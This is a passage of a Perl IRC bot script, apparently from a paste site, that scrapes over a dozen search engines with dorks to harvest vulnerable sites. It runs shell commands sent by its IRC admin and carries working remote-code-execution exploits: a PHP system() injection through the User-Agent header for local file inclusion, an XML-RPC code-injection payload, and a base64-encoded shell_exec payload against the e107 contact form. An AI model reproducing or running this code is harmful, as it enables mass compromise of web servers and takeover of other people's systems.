- if ($engine eq "JacKUK") { my @jackuk = &jack1($dork."+site:uk"); push(@total,@jackuk); }
- if ($engine eq "JacKUS") { my @jackus = &jack2($dork."+site:us"); push(@total,@jackus); }
- if ($engine eq "JacKSI") { my @jacksi = &jack3($dork."+site:si"); push(@total,@jacksi); }
- if ($engine eq "JacKBE") { my @jackbe = &jack4($dork."+site:be"); push(@total,@jackbe); }
- if ($engine eq "JacKBIZ") { my @jackbiz = &jack5($dork."+site:biz"); push(@total,@jackbiz); }
- }
- if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); }
- if ($gps2 == 1) {
- if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); }
- if ($engine eq "YaHoo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }
- if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); }
- if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }
- if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); }
- if ($engine eq "OnEt") { my @onet = &onet($dork); push(@total,@onet); }
- if ($engine eq "CLusTy") { my @clusty = &clusty($dork); push(@total,@clusty); }
- if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); }
- if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); }
- if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); }
- if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }
- if ($engine eq "SeZNam") { my @seznam = &seznam($dork); push(@total,@seznam); }
- if ($engine eq "BigLobe") { my @biglobe = &biglobe($dork); push(@total,@biglobe); }
- }
- @clean = &clean(@total);
- if ($silentmode == 0) {
- &msg("$chan","$logo $engine <=> Total: [".scalar(@total)."] Clean: [".scalar(@clean)."] "); }
- return @clean;
- }
- ##################################################################################
- sub isFound() {
- my $status = 0;
- my $link = $_[0];
- my $reqexp = $_[1];
- my $res = &get_content($link);
- if ($res =~ /$reqexp/) { $status = 1 }
- return $status;
- }
- sub get_content() {
- my $url = $_[0];
- my $ua = LWP::UserAgent->new(agent => $uagent);
- $ua->timeout($timot);
- my $req = HTTP::Request->new(GET => $url);
- my $res = $ua->request($req);
- return $res->content;
- }
- ######################################### SEARCH ENGINE
- sub jack1() {
- my @list;
- my $key = $_[0];
- for (my $i=0; $i<=1000; $i+=100){
- my $search = ($jack1.uri_escape($key)."&num=100&start=".$i);
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
- my $link = $1;
- if ($link !~ /google/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub jack2() {
- my @list;
- my $key = $_[0];
- for (my $i=0; $i<=1000; $i+=100){
- my $search = ($jack2.uri_escape($key)."&num=100&start=".$i);
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
- my $link = $1;
- if ($link !~ /google/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub jack3() {
- my @list;
- my $key = $_[0];
- for (my $i=0; $i<=1000; $i+=100){
- my $search = ($jack3.uri_escape($key)."&num=100&start=".$i);
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
- my $link = $1;
- if ($link !~ /google/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub jack4() {
- my @list;
- my $key = $_[0];
- for (my $i=0; $i<=1000; $i+=100){
- my $search = ($jack4.uri_escape($key)."&num=100&start=".$i);
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
- my $link = $1;
- if ($link !~ /google/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub jack5() {
- my @list;
- my $key = $_[0];
- for (my $i=0; $i<=1000; $i+=100){
- my $search = ($jack5.uri_escape($key)."&num=100&start=".$i);
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
- my $link = $1;
- if ($link !~ /google/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub google() {
- my @list;
- my $key = $_[0];
- for (my $i=0; $i<=1000; $i+=100){
- my $search = ("http://www.google.com/search?q=".uri_escape($key)."&num=100&filter=0&start=".$i);
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
- my $link = $1;
- if ($link !~ /google/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub walla() {
- my @list;
- my $key = $_[0];
- for ($b=0; $b<=100; $b+=1) {
- my $search = ("http://search.walla.co.il/?q=".uri_escape($key)."&type=text&page=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"http:\/\/(.+?)\" title=/g) {
- my $link = $1;
- if ($link !~ /walla\.co\.il/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub yahoo(){
- my @list;
- my $key = $_[0];
- for ($b=1; $b<=1000; $b+=10) {
- my $search = ("http://search.yahoo.com/search?p=".uri_escape($key)."&b=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/http\%3a\/\/(.+?)\"/g) {
- my $link = $1;
- if ($link !~ /yahoo\.com/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub ask() {
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=1000; $i+=100) {
- my $search = ("http://uk.ask.com/web?q=".uri_escape($key)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
- my $res = &search_engine_query($search);
- while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
- my $link = $1;
- if ($link !~ /ask\.com/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub onet() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=1; $b<=400; $b+=10) {
- my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".uri_escape($key));
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"http:\/\/(.*?)\">/g) {
- my $link = $1;
- if ($link !~ /onet|webcache|query/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub clusty() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=10; $b<=200; $b+=10) {
- my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v%3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".uri_escape($key)."&v:state=root|root-".$b."-20|0&");
- my $res = &search_engine_query($search);
- if ($res !~ /next/) {$b=100;}
- while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
- my $link = $1;
- if ($1 !~ /yippy\.com/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub bing() {
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=400; $i+=10) {
- my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=".$i);
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
- my $link = $1;
- if ($link !~ /google/) {
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub sapo(){
- my @list;
- my $key = $_[0];
- for ($b=1; $b<=50; $b+=1) {
- my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$b."&q=".uri_escape($key)."&st=local");
- my $res = &search_engine_query($search);
- if ($res !~ m/Next/i) {$b=50;}
- while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
- my $link = $1;
- if ($1 !~ /\.sapo\.pt/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub lycos() {
- my @list;
- my $key = $_[0];
- for ($b=0; $b<=50; $b+=1) {
- my $search = ("http://search.lycos.com/web?q=".uri_escape($key)."&pn=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/title=\"http:\/\/(.*?)\"/g) {
- my $link = $1;
- if ($link !~ /lycos\.com/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub uol() {
- my @list;
- my $key = $_[0];
- for ($b=0; $b<=1000; $b+=10) {
- my $search = ("http://busca.uol.com.br/web/?ref=homeuol&q=".uri_escape($key)."&start=".$b);
- my $res = &search_engine_query($search);
- if ($res =~ m/retornou nenhum resultado/i) {$b=500;}
- while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) {
- my $link = $1;
- if ($link !~ /uol\.com\.br|\/web/i){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub seznam() {
- my @list;
- my $key = $_[0];
- for ($b=1; $b<=300; $b+=20) {
- my $search = ("http://search.seznam.cz/?q=".uri_escape($key)."&count=20&from=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) {
- my $link = $1;
- if ($link !~ /seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/i){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub hotbot() {
- my @list;
- my $key = $_[0];
- for ($b=0; $b<=50; $b+=1) {
- my $search = ("http://www.hotbot.com/search/web?pn=".$b."&q=".uri_escape($key));
- my $res = &search_engine_query($search);
- if ($res =~ m/had no web result/i) {$b=50;}
- while ($res =~ m/href=\"http:\/\/(.+?)\" title=/g) {
- my $link = $1;
- if ($link !~ /hotbot\.com/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub aol() {
- my @list;
- my $key = $_[0];
- for ($b=0; $b<=300; $b+=10) {
- my $search = ("http://search.aol.com/aol/search?q=".uri_escape($key)."&page=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/href=\"http:\/\/(.*?)\"/g) {
- my $link = $1;
- if ($link !~ /aol\.com/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub biglobe {
- my $key = $_[0];
- my @list;
- for ($b=1; $b<=500; $b+=10) {
- $num += $num;
- my $search = "http://cgi.search.biglobe.ne.jp/cgi-bin/search-st_lp2?start=".$b."&ie=utf8&num=".$num."&q=".uri_escape($key)."&lr=all";
- my $res = &search_engine_query($search);
- while ( $res =~ m/<a href=\"http:\/\/(.+?)\"/g ) {
- my $link = $1;
- if ($link !~ /biglobe/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- #########################################
- sub clean() {
- my @cln = ();
- my %visit = ();
- foreach my $element (@_) {
- $element =~ s/\/+/\//g;
- next if $visit{$element}++;
- push @cln, $element;
- }
- return @cln;
- }
- sub links() {
- my @list;
- my $link = $_[0];
- my $host = $_[0];
- my $hdir = $_[0];
- $hdir =~ s/(.*)\/[^\/]*$/\1/;
- $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
- $host .= "/";
- $link .= "/";
- $hdir .= "/";
- $host =~ s/\/\//\//g;
- $hdir =~ s/\/\//\//g;
- $link =~ s/\/\//\//g;
- push(@list,$link,$host,$hdir);
- return @list;
- }
- sub search_engine_query() {
- my $url = $_[0];
- $url =~ s/http:\/\///;
- my $host = $url;
- my $query = $url;
- my $page = "";
- $host =~ s/href=\"?http:\/\///;
- $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
- $query =~ s/$host//;
- if ($query eq "") { $query = "/"; }
- eval {
- my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
- my $sget = "GET $query HTTP/1.0\r\n";
- $sget .= "Host: $host\r\n";
- $sget .= "Accept: */*\r\n";
- $sget .= "User-Agent: $uagent\r\n";
- $sget .= "Connetion: Close\r\n\r\n";
- print $sock $sget;
- my @pages = <$sock>;
- $page = "@pages";
- close($sock);
- };
- return $page;
- }
- #########################################
- sub shell() {
- my $path = $_[0];
- my $cmd = $_[1];
- if ($cmd =~ /cd (.*)/) {
- chdir("$1") || &msg("$path","No such file or directory");
- return;
- }
- elsif ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- my @output = `$cmd 2>&1 3>&1`;
- my $c = 0;
- foreach my $output (@output) {
- $c++;
- chop $output;
- &msg("$path","$output");
- if ($c == 5) { $c = 0; sleep 3; }
- }
- exit;
- }}
- }
- sub isAdmin() {
- my $status = 0;
- my $nick = $_[0];
- if ($nick eq $admin) { $status = 1; }
- return $status;
- }
- sub msg() {
- return unless $#_ == 1;
- sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
- }
- sub nick() {
- return unless $#_ == 0;
- sendraw("NICK $_[0]");
- }
- sub notice() {
- return unless $#_ == 1;
- sendraw("NOTICE $_[0] :$_[1]");
- }
- sub cmdlfi() {
- my $browser = LWP::UserAgent->new;
- my $url = $_[0];
- my $cmd = $_[1];
- my $chan = $_[2];
- my $hie = "lobex<?system(\"$cmd 2> /dev/stdout\"); ?>byroe";
- $browser->agent("$hie");
- $browser->timeout(7);
- $response = $browser->get( $url );
- if ($response->content =~ /lobex(.*)byroe/s) {
- &msg("$chan","$lfilogo ".$1." ");
- } else {
- &msg("$chan","$lfilogo No Output ");
- }
- }
- sub cmdxml() {
- my $jed = $_[0];
- my $dwa = $_[1];
- my $chan = $_[2];
- my $userAgent = LWP::UserAgent->new(agent => 'perl post');
- $exploit = "<?xml version=\"1.0\"?><methodCall>";
- $exploit .= "<methodName>test.method</methodName>";
- $exploit .= "<params><param><value><name>',''));";
- $exploit .= "echo'bamby';system('".$dwa."');echo'solo';exit;/*</name></value></param></params></methodCall>";
- my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);
- if ($response->content =~ /bamby(.*)solo/s) {
- &msg("$chan","$xmllogo $1 ");
- } else {
- &msg("$chan","$xmllogo No Output ");
- }
- }
- sub cmde107() {
- my $path = $_[0];
- my $code = $_[1];
- my $chan = $_[2];
- my $codecmd = encode_base64($code);
- my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"));';
- my $req = HTTP::Request->new(POST => $path);
- $req->content_type('application/x-www-form-urlencoded');
- $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
- my $ua = LWP::UserAgent->new(agent => $uagent);
- $ua->timeout(7);
- my $res = $ua->request($req);
- my $data = $res->as_string;
- if ( $data =~ /ByroeNet(.*)/ ){
- $mydata = $1;
- &msg("$chan","(E107) $mydata ");
- }
- else { &msg("$chan","(E107) No Output "); }
Add Comment
Please, Sign In to add comment